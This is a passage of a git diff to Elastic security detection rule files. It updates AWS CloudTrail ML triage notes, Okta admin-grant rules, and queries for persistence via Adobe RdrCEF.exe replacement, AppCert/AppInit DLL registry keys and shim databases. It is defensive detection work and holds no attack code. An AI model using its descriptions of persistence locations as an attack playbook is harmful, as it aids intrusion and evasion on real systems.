and request password resets for other IAM users.\n- Look into enabling multi-factor authentication for users.\n- Follow security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Country For an AWS Command\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and\nunderstanding what is considered normal behavior within an organization, you can spot suspicious or malicious activity\nwhen deviations occur.\n\nThis rule uses a machine learning job to detect an AWS API command that while not inherently suspicious or abnormal, is\nsourcing from a geolocation (country) that is unusual for the command. This can be the result of compromised credentials\nor keys used by a threat actor in a different geography than the authorized user(s).\n\nDetection alerts from this rule indicate an AWS API command or method call that is rare and unusual for the geolocation\nof the source IP address.\n\n#### Possible investigation steps\n\n- Identify the user account involved and the action performed. Verify whether it should perform this kind of action.\n - Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the \n `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context.\n - The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. These might indicate the source of the program or the nature of its tasks.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal\ntime of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False Positive Analysis\n\n- False positives can occur if activity is coming from new employees based in a country with no previous history in AWS.\n- Examine the history of the command. If the command only manifested recently, it might be part of a new automation\nmodule or script. If it has a consistent cadence (for example, it appears in small numbers on a weekly or monthly cadence),\nit might be part of a housekeeping or maintenance process. You can find the command in the `event.action field` field.\n\n### Related Rules\n\n- Unusual City For an AWS Command - 809b70d3-e2c3-455e-af1b-2626a5a1a276\n- Unusual AWS Command for a User - ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1\n- Rare AWS Error Code - 19de8096-e2b0-4bd8-80c9-34a820813fff\n- Spike in AWS Error Messages - 78d3d8d9-b476-451d-a9e0-7a5addd70670\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], + "related_integrations": [], "risk_score": 21, "rule_id": "dca28dee-c999-400f-b640-50a081cc0fd1", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -26,5 +28,5 @@ "ML" ], "type": "machine_learning", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_user.json index 53f9fab8d1b48..332623363bc32 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_user.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_cloudtrail_rare_method_by_user.json @@ -12,12 +12,14 @@ "license": "Elastic License v2", "machine_learning_job_id": "rare_method_for_a_username", "name": "Unusual AWS Command for a User", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n## Triage and analysis\n\n### Investigating an Unusual CloudTrail Event\n\nDetection alerts from this rule indicate an AWS API command or method call that is rare and unusual for the calling IAM user. Here are some possible avenues of investigation:\n- Consider the user as identified by the `user.name` field. Is this command part of an expected workflow for the user context? Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context. The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Consider the source IP address and geolocation for the calling user who issued the command. Do they look normal for the calling user? If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts, or could it be sourcing from an EC2 instance that's not under your control? If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles? Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human, not a program or script, did the activity take place during a normal time of day?\n- Examine the history of the command. If the command, which is visible in the `event.action field`, only manifested recently, it might be part of a new automation module or script. If it has a consistent cadence (for example, if it appears in small numbers on a weekly or monthly cadence), it might be part of a housekeeping or maintenance process.\n- Examine the request parameters. These may provide indications as to the source of the program or the nature of the tasks it is performing.", + "note": "## Triage and analysis\n\n### Investigating Unusual AWS Command for a User\n\nCloudTrail logging provides visibility on actions taken within an AWS environment. By monitoring these events and\nunderstanding what is considered normal behavior within an organization, you can spot suspicious or malicious activity\nwhen deviations occur.\n\nThis rule uses a machine learning job to detect an AWS API command that while not inherently suspicious or abnormal, is\nbeing made by a user context that does not normally use the command. This can be the result of compromised credentials or\nkeys as someone uses a valid account to persist, move laterally, or exfiltrate data.\n\nDetection alerts from this rule indicate an AWS API command or method call that is rare and unusual for the calling IAM\nuser.\n\n#### Possible investigation steps\n\n- Identify the user account involved and the action performed. Verify whether it should perform this kind of action.\n - Examine the user identity in the `aws.cloudtrail.user_identity.arn` field and the access key ID in the \n `aws.cloudtrail.user_identity.access_key_id` field, which can help identify the precise user context.\n - The user agent details in the `user_agent.original` field may also indicate what kind of a client made the request.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, or network administrator activity.\n- Examine the request parameters. These might indicate the source of the program or the nature of its tasks.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Consider the time of day. If the user is a human (not a program or script), did the activity take place during a normal\ntime of day?\n- Contact the account owner and confirm whether they are aware of this activity if suspicious.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- Examine the history of the command. If the command only manifested recently, it might be part of a new automation\nmodule or script. If it has a consistent cadence (for example, it appears in small numbers on a weekly or monthly cadence),\nit might be part of a housekeeping or maintenance process. You can find the command in the `event.action field` field.\n\n### Related Rules\n\n- Unusual City For an AWS Command - 809b70d3-e2c3-455e-af1b-2626a5a1a276\n- Unusual Country For an AWS Command - dca28dee-c999-400f-b640-50a081cc0fd1\n- Rare AWS Error Code - 19de8096-e2b0-4bd8-80c9-34a820813fff\n- Spike in AWS Error Messages - 78d3d8d9-b476-451d-a9e0-7a5addd70670\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "references": [ "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" ], + "related_integrations": [], "risk_score": 21, "rule_id": "ac706eae-d5ec-4b14-b4fd-e8ba8086f0e1", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -26,5 +28,5 @@ "ML" ], "type": "machine_learning", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_policy_rule.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_policy_rule.json deleted file mode 100644 index d865bda9c3a6f..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_policy_rule.json +++ /dev/null @@ -1,37 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Detects attempts to delete a rule within an Okta policy. An adversary may attempt to delete an Okta policy rule in order to weaken an organization's security controls.", - "false_positives": [ - "Consider adding exceptions to this rule to filter false positives if Okta MFA rules are regularly modified in your organization." - ], - "index": [ - "filebeat-*", - "logs-okta*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Attempt to Delete an Okta Policy Rule", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:okta.system and event.action:policy.rule.delete\n", - "references": [ - "https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm", - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/" - ], - "risk_score": 21, - "rule_id": "d5d86bf5-cf0c-4c06-b688-53fdc072fdfd", - "severity": "low", - "tags": [ - "Elastic", - "Identity", - "Okta", - "Continuous Monitoring", - "SecOps", - "Monitoring" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 4 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_policy_rule.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_policy_rule.json deleted file mode 100644 index cae49f5789b29..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_policy_rule.json +++ /dev/null @@ -1,37 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Detects attempts to modify a rule within an Okta policy. An adversary may attempt to modify an Okta policy rule in order to weaken an organization's security controls.", - "false_positives": [ - "Consider adding exceptions to this rule to filter false positives if Okta MFA rules are regularly modified in your organization." - ], - "index": [ - "filebeat-*", - "logs-okta*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Attempt to Modify an Okta Policy Rule", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:okta.system and event.action:policy.rule.update\n", - "references": [ - "https://help.okta.com/en/prod/Content/Topics/Security/Security_Policies.htm", - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/" - ], - "risk_score": 21, - "rule_id": "000047bb-b27a-47ec-8b62-ef1a5d2c9e19", - "severity": "low", - "tags": [ - "Elastic", - "Identity", - "Okta", - "Continuous Monitoring", - "SecOps", - "Identity and Access" - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 6 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_threat_detected_by_okta_threatinsight.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_threat_detected_by_okta_threatinsight.json index c2225b53e30b6..69080835ad338 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_threat_detected_by_okta_threatinsight.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_threat_detected_by_okta_threatinsight.json @@ -10,14 +10,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Threat Detected by Okta ThreatInsight", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:security.threat.detected\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6885d2ae-e008-4762-b98a-e8e1cd3a81e9", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -29,5 +48,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_account_creation_hide_at_logon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_account_creation_hide_at_logon.json index dc8a5ba10fa00..38b910adbb332 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_account_creation_hide_at_logon.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_account_creation_hide_at_logon.json @@ -15,6 +15,28 @@ "references": [ "https://support.apple.com/en-us/HT203998" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "41b638a1-8ab6-4f8e-86d9-466317ef2db5", "severity": "medium", @@ -51,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ad_adminsdholder.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ad_adminsdholder.json index cc94c5962192b..77fa84782d7cc 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ad_adminsdholder.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ad_adminsdholder.json @@ -16,6 +16,23 @@ "https://adsecurity.org/?p=1906", "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/appendix-c--protected-accounts-and-groups-in-active-directory#adminsdholder" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.ObjectDN", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "6e9130a5-9be6-48e5-943a-9628bfc74b18", "severity": "high", @@ -40,5 +57,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_privileges_assigned_to_okta_group.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_privileges_assigned_to_okta_group.json index 071fb643083a1..e1f51b2826e3a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_privileges_assigned_to_okta_group.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_privileges_assigned_to_okta_group.json @@ -13,15 +13,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Administrator Privileges Assigned to an Okta Group", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:group.privilege.grant\n", "references": [ "https://help.okta.com/en/prod/Content/Topics/Security/administrators-admin-comparison.htm", "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b8075894-0b62-46e5-977c-31275da34419", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_role_assigned_to_okta_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_role_assigned_to_okta_user.json index eccd892913023..fbcf196cb1680 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_role_assigned_to_okta_user.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_administrator_role_assigned_to_okta_user.json @@ -13,15 +13,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Administrator Role Assigned to an Okta User", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:user.account.privilege.grant\n", "references": [ "https://help.okta.com/en/prod/Content/Topics/Security/administrators-admin-comparison.htm", "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f06414a6-f2a4-466d-8eba-10f85e8abf71", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_adobe_hijack_persistence.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_adobe_hijack_persistence.json index 2048d4597b117..ccedd9bfbd6ad 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_adobe_hijack_persistence.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_adobe_hijack_persistence.json @@ -12,13 +12,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Adobe Hijack Persistence", - "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched\nwhenever Adobe Acrobat Reader is executed.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched\nwhenever Adobe Acrobat Reader is executed.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "file where event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", "references": [ "https://twitter.com/pabraeken/status/997997818362155008" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_app_compat_shim.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_app_compat_shim.json index 0b746cb381898..c17a4648b780e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_app_compat_shim.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_app_compat_shim.json @@ -13,6 +13,33 @@ "license": "Elastic License v2", "name": "Installation of Custom Shim Databases", "query": "sequence by process.entity_id with maxspan = 5m\n [process where event.type in (\"start\", \"process_started\") and\n not (process.name : \"sdbinst.exe\" and process.parent.name : \"msiexec.exe\")]\n [registry where event.type in (\"creation\", \"change\") and\n registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\*.sdb\"]\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "c5ce48a6-7f57-4ee8-9313-3d0024caee10", "severity": "medium", @@ -48,5 +75,5 @@ } ], "type": "eql", - "version": 3 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appcertdlls_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appcertdlls_registry.json index c7c6f3f4ba60a..a535a98df43e1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appcertdlls_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appcertdlls_registry.json @@ -12,10 +12,18 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppCert DLL", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "registry where\n/* uncomment once stable length(bytes_written_string) > 0 and */\n registry.path : \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Session Manager\\\\AppCertDLLs\\\\*\"\n", + "required_fields": [ + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "513f0ffd-b317-4b9c-9494-92ce861f22c7", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +58,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appinitdlls_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appinitdlls_registry.json index c61d7e11291c6..9af2e067c4c18 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appinitdlls_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_appinitdlls_registry.json @@ -12,10 +12,23 @@ "language": "eql", "license": "Elastic License v2", "name": "Registry Persistence via AppInit DLL", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where\n registry.path : (\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\", \n \"HKLM\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit_Dlls\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\", \n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\", \n \"C:\\\\Program 